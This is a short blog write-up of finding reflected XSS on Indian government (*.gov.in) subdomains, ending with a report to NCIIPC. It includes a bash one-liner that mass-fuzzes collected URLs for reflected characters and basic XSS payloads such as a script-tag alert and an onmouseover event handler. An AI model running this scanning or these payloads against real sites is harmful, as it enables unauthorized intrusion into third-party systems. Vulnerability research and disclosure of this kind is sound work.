How I found Reflected XSS on *.GOV.IN
This blog will help you find all the vulnerable parameters in any web application. It will also teach you how to exploit vulnerabilities like XSS and SQLI by approaching any website.
What is Reflected XSS:
Reflected cross-site scripting (or XSS) is a security vulnerability that occurs when an application receives data in an HTTP request and stores it within the response without properly filtering and sanitizing it.
Lets move step by step:
Select the domain: *.gov.in
Step 1: Find all possible subdomain under selected domain
Step 2: Select any one subdomain
Step 3: Find out all possible parameters using tool like Paramspider
Step 4: Examine all urls that are directly reflecting special characters.
To automate, use below script:
cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt
The script shows these parameters as Vulnerable:
Step 5: Try it Manually now:
Lets try will basic XSS payload:
"><script>alert(1);</script>Doesn’t work:
No Pop-Ups:
Lets Start from the beginning:
Just try with: single quote
'
No input validation or Sanitization is present:
Now Try with some events:
' onmouseover=alert(1);>
Hover your mouse over the links after entering the payload to have it executed.
Lets see source code:
We got XSS, Now report to NCIIPC
